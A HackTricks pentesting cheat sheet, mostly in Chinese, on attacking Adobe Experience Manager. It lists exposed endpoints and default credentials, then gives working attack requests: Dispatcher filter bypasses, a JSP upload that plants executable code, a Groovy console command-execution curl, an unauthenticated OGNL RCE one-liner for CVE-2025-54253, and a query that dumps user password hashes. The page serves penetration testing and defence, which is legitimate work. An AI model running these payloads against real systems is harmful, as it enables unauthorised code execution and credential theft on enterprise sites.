AEM (Adobe Experience Manager) Pentesting

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) 是一个企业级 CMS,运行在 Apache Sling/Felix (OSGi) 和 Java Content Repository (JCR) 之上。
从攻击者的视角,AEM 实例经常暴露危险的开发端点、弱的 Dispatcher 规则、默认凭据以及每季度修补的长尾 CVE。

下面的检查清单侧重于 externally reachable (unauth) attack surface,这些问题在实际项目(2022-2026)中不断出现。

1. Fingerprinting

$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding

其他快速指示:

  • /etc.clientlibs/ 静态路径存在(返回 JS/CSS)。
  • /libs/granite/core/content/login.html 登录页面,带有 “Adobe Experience Manager” 横幅。
  • </script><!--/* CQ */--> 注释在 HTML 底部。

2. 高价值的未认证端点

PathWhat you getNotes
/.json, /.1.jsonJCR 节点,通过 DefaultGetServlet通常被阻止,但 Dispatcher bypass(见下)有效。
/bin/querybuilder.json?path=/QueryBuilder APILeak 页面树、内部路径和用户名。
/system/console/status-*, /system/console/bundlesOSGi/Felix console默认返回 403;如果暴露且找到 creds ⇒ bundle-upload RCE。
/crx/packmgr/index.jspPackage Manager允许已认证的 content packages → JSP payload 上传。
/etc/groovyconsole/**AEM Groovy Console如果暴露 → 任意 Groovy / Java 执行。
/libs/cq/AuditlogSearchServlet.jsonAudit logs信息泄露。
/libs/cq/ui/content/dumplibs.htmlClientLibs dumpXSS 向量。
/adminui/debugAEM Forms on JEE Struts dev-mode OGNL evaluator在配置错误的 Forms 安装上(CVE-2025-54253)此端点会执行未认证的 OGNL → RCE。

Dispatcher bypass tricks (still working in 2025/2026)

大多数生产站点位于 Dispatcher(反向代理)之后。通过滥用编码字符或允许的静态扩展名,过滤规则经常被绕过。

Classic semicolon + allowed extension

GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1

Encoded slash bypass (2025 KB ka-27832)

GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1

If the Dispatcher allows encoded slashes, this returns JSON even when /bin is supposedly denied.

3. Common misconfigurations (still alive in 2026)

  1. Anonymous POST servletPOST /.json with :operation=import lets you plant new JCR nodes. Blocking *.json POST in the Dispatcher fixes it.
  2. World-readable user profiles – default ACL grants jcr:read on /home/users/**/profile/* to everyone.
  3. Default credentialsadmin:admin, author:author, replication:replication.
  4. WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
  5. Groovy Console exposed – remote code execution by sending a Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
  1. Dispatcher encoded-slash gap/bin/querybuilder.json and /etc/truststore.json reachable with %2f/%3B even when blocked by path filters.
  2. AEM Forms Struts devMode left enabled/adminui/debug?expression= evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.

4. Recent vulnerabilities (service-pack cadence)

季度CVE / 公告受影响版本影响
Dec 2025APSB25-115, CVE-2025-64537/645396.5.24 & earlier, Cloud 2025.12Multiple critical/stored XSS → code execution via author UI.
Sep 2025APSB25-906.5.23 & earlierSecurity feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12.
Aug 2025CVE-2025-54253 / 54254 (AEM Forms JEE)Forms 6.5.23.0 and earlierDevMode OGNL RCE + XXE file read, unauthenticated.
Jun 2025APSB25-486.5.23 & earlierStored XSS and privilege escalation in Communities components.
Dec 2024APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74)6.5.22 & earlierDOM/Stored XSS, arbitrary code exec (low-priv).
Dec 2023APSB23-72≤ 6.5.18DOM-based XSS via crafted URL.

Always check the APSB bulletin matching the customer’s service-pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.

5. Exploitation snippets

5.1 RCE via dispatcher bypass + JSP upload

If anonymous write is possible:

# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import

现在请求 /content/evil.jsp – 该 JSP 以 AEM 进程用户权限运行。

5.2 SSRF to RCE (历史版本 < 6.3)

/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console aem_ssrf2rce.py 来自 aem-hacker,可自动化整个链条。

5.3 OGNL RCE 在 AEM Forms JEE (CVE-2025-54253)

# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"

如果存在漏洞,HTTP 响应体包含命令输出。

5.4 QueryBuilder hash disclosure (encoded slash bypass)

GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1

当匿名读取 ACLs 为默认时,返回包含 rep:password 哈希的用户节点。

6. 工具

  • aem-hacker – 多功能的枚举脚本,支持 dispatcher bypass、SSRF 检测、default-creds 检查等。
python3 aem_hacker.py -u https://target --host attacker-ip
  • Tenable WAS plugin 115065 – 自动检测 QueryBuilder hash disclosure & encoded-slash bypass(发布于 2025 年 12 月)。
  • Content brute-force – 递归请求 /_jcr_content.(json|html) 以发现隐藏组件。
  • osgi-infect – 通过 /system/console/bundles 上传恶意 OSGi bundle(如果有 creds)。

参考资料

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks